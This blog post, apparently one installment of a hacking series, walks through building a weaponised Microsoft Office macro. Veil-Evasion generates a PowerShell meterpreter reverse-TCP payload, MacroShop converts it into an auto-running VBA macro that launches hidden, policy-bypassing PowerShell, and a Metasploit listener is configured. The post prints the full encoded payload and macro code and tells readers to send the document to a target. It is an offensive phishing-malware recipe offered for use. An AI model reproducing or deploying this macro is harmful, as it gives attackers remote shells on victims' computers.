Hello guys,
Today the 3th part of the serie. Today we are going to use 2 tools!
The first tool is veil and you can install it in kali by using: apt-get install veil-evasion (It's really large and a really long installation).
The 2nd tool is macro shop. Git clone it by: git clone https://github.com/khr0x40sh/MacroShop.git
Open up veil by running veil-evasion.
If you want to see all the available payloads use:list.
The payload we want is number 22... The meterpreter/powershell/rev_tcp
Select it by the command: use 22
and the the LHOST and the LPORT: LHOST=192.168.x.x, LPORT=443, generatename=doesntreallymaters .
You will get this output:
Language: powershell
Payload: powershell/meterpreter/rev_tcp
Required Options: LHOST=192.168.1.22 LPORT=443
Payload File:/var/lib/veilevasion/output/source/hi.bat
Handler File: var/lib/veil-evasion/output/handlers/hi_handler.rc
and type exit to exit veil.
Go to the shellcode file and open it with leafpad (Or wahtever editor you want)
leafpad var/lib/veil-evasion/output/source/hi.bat
Your macro file will look like this:
@echo off
if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command
"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream
($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String
(\"nVPbbtswDH33VxCGgdqIbTiXFl2KAr0hW4EtK5piewjy4Chso1WWDIlO4nb599Gts61FNwzzy5E
l8pwjkgoEHMOJ700vl
LosSmMp9O/RalT9XrpQyo9mUFZzJQU4yokBN8TncKnpiix8kZaqXJ0qZUTY7q1jqKQm2LRYt/gQHf23zrnFnPBmybDY6VQt7y
qGX8rt6jftdqdR9088svVj4PjSY1wnn+ffUBBMakdYpGOkdGLEPZJrEcLpG2eni4VF50Z5IVU9Gw5ZAC0
HrI29j+GtjGe8qUv
k8AnxJYq3A6+sISOMakNvRBl5gUvPjdZsNNzrvuul3YPDtJv2ensxDPiL4DuYihJdKXUEQclXm55amzfO
nqt2qbmkWmDoz2tCn
9MiDtxwIFNfo0C5wjAoXxE98HnmBfU/8E3PJLHFFVouRGPbcEn6PeaMs6iz36jV02zWEG7ORt56KRVC
yAqJor8nR/DYOOm8tFr
HwUNnP+734j8Xe6TyO8d0Y6Mxgq13ayxLyuMum5EsjDBoVp0OS7C7QDb2dnSvLL1HOuObunDK
IzVjJx9yvVAYcVbSnW29gDiXpy
Jp2gZJgcUc7QXeSi1JGg2BgGScFwj+V6n7PR8SzX+uzAXC086o0qKJdJCUuXO0tFXToeOAhsMXLyyLgz
r9iPqOlnG26WdZxjDII
m/n/LrSJAtMn2bSlBO0KynQpZ9y65a5anpoyropIWTcuOe3MQuDTbqrexTF8FOEp492bW8fHyvGwS
ZuIHs5MhPKLSUThVhCMkFh
9AIODwZZthU5ieXj9gc=\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII))
.ReadToEnd();") else (%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden
-Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader
As you can see this file is not written in visual basic (.vbs) but in powershell, so we can't use this code directly. This is where we need the macroshop. The program in the macro shop is called macro safe. move to the folder we've gitcloned macroshop to by using: cd Macroshop and run the file with python. Python macro_safe.py /var/lib/veil-evasion/output/source/hi.bat doesntreallymater.txt
Well done our PowerShell code is now translated to Visual Basic :)
The output is something like this:
Sub Workbook_Open()
'VBA arch detect suggested by "T"
Dim Command As String
Dim str As String
Dim exec As String
Arch = Environ("PROCESSOR_ARCHITECTURE")
windir = Environ("windir")
If Arch = "AMD64" Then
Command = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"
Else
Command = "powershell.exe"
End If
str = "nVPbbtswDH33VxCGgdqIbTiXFl2KAr0hW4EtK5piewjy4Chso1WWDI"
str = str + "lO4nb599Gts61FNwzzy5El8pwjkgoEHMOJ700vlLosSmMp9O"
str = str + "/RalT9XrpQyo9mUFZzJQU4yokBN8TncKnpiix8kZaqXJ0qZU"
str = str + "TY7q1jqKQm2LRYt/gQHf23zrnFnPBmybDY6VQt7yqGX8rt6j"
str = str + "ftdqdR9088svVj4PjSY1wnn+ffUBBMakdYpGOkdGLEPZJrEc"
str = str + "LpG2eni4VF50Z5IVU9Gw5ZAC0HrI29j+GtjGe8qUvk8AnxJY"
str = str + "q3A6+sISOMakNvRBl5gUvPjdZsNNzrvuul3YPDtJv2ensxDP"
str = str + "iL4DuYihJdKXUEQclXm55amzfOnqt2qbmkWmDoz2tCn9MiDt"
str = str + "xwIFNfo0C5wjAoXxE98HnmBfU/8E3PJLHFFVouRGPbcEn6Pe"
str = str + "aMs6iz36jV02zWEG7ORt56KRVCyAqJor8nR/DYOOm8tFrHwU"
str = str + "NnP+734j8Xe6TyO8d0Y6Mxgq13ayxLyuMum5EsjDBoVp0OS7"
str = str + "C7QDb2dnSvLL1HOuObunDKIzVjJx9yvVAYcVbSnW29gDiXpy"
str = str + "Jp2gZJgcUc7QXeSi1JGg2BgGScFwj+V6n7PR8SzX+uzAXC08"
str = str + "6o0qKJdJCUuXO0tFXToeOAhsMXLyyLgzr9iPqOlnG26WdZxj"
str = str + "DIIm/n/LrSJAtMn2bSlBO0KynQpZ9y65a5anpoyropIWTcuO"
str = str + "e3MQuDTbqrexTF8FOEp492bW8fHyvGwSZuIHs5MhPKLSUThV"
str = str + "hCMkFh9AIODwZZthU5ieXj9gc="
exec = Command + " -NoP -NonI -W Hidden -Exec Bypass -Comm"
exec = exec + "and ""Invoke-Expression $(New-Object IO.StreamRea"
exec = exec + "der ($(New-Object IO.Compression.DeflateStream ("
exec = exec + "$(New-Object IO.MemoryStream (,$([Convert]::From"
exec = exec + "Base64String(\"" " & str & " \"" )))), [IO.Compr"
exec = exec + "ession.CompressionMode]::Decompress)), [Text.Enc"
exec = exec + "oding]::ASCII)).ReadToEnd();"""
Shell exec,vbHide
End Sub
go to metasploit and run this commands:
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.x.x
set LPORT 443
exploit
And switch to a windows box and open microsoft word or microsoft exel. Go to the 'view' tab, select the macro's button
and then view macro's
Add a new macro (Just give it the name you want)and press create.
(You can do all this steps in one just Hit alt+F11).
Remove the things your document standard creates and paste in the generated macro code into the editor. Just close the macro editor and do one of the most important steps of this tutorial! Save the file as WhateverYouWant.docm (Macro-Enabled document) or WhateverYouWant.doc (Must be word 97-2003 Document!)
Press save and send your file to your target. Switch back to the system you're running your metasploit listener on.
Okay 3th method to pwn a box with Macro's
See ya later guys
Bye :)
@ClaimItToYou
0 Reacties
Hey guys what's up. this is a short message from @claimittoyou...
As you may know I've stopped the Funny Friday serie... Well stop crying, dry your tears, especially for you I will start a new hacking serie. The title of the new serie is: Microsoft's meterpreter macro's. The reason why I've chosen this title is becouse in this serie we're going to inject Microsoft Office files (Word,Exel, maybe powerpoing) with malicious .vbs macro's with various tools to directly execute shellcode on our targets(FUD). That was it for now, See ya later guys :) @ClaimItToYou |
Archives
Maart 2016
Categories
Alles
|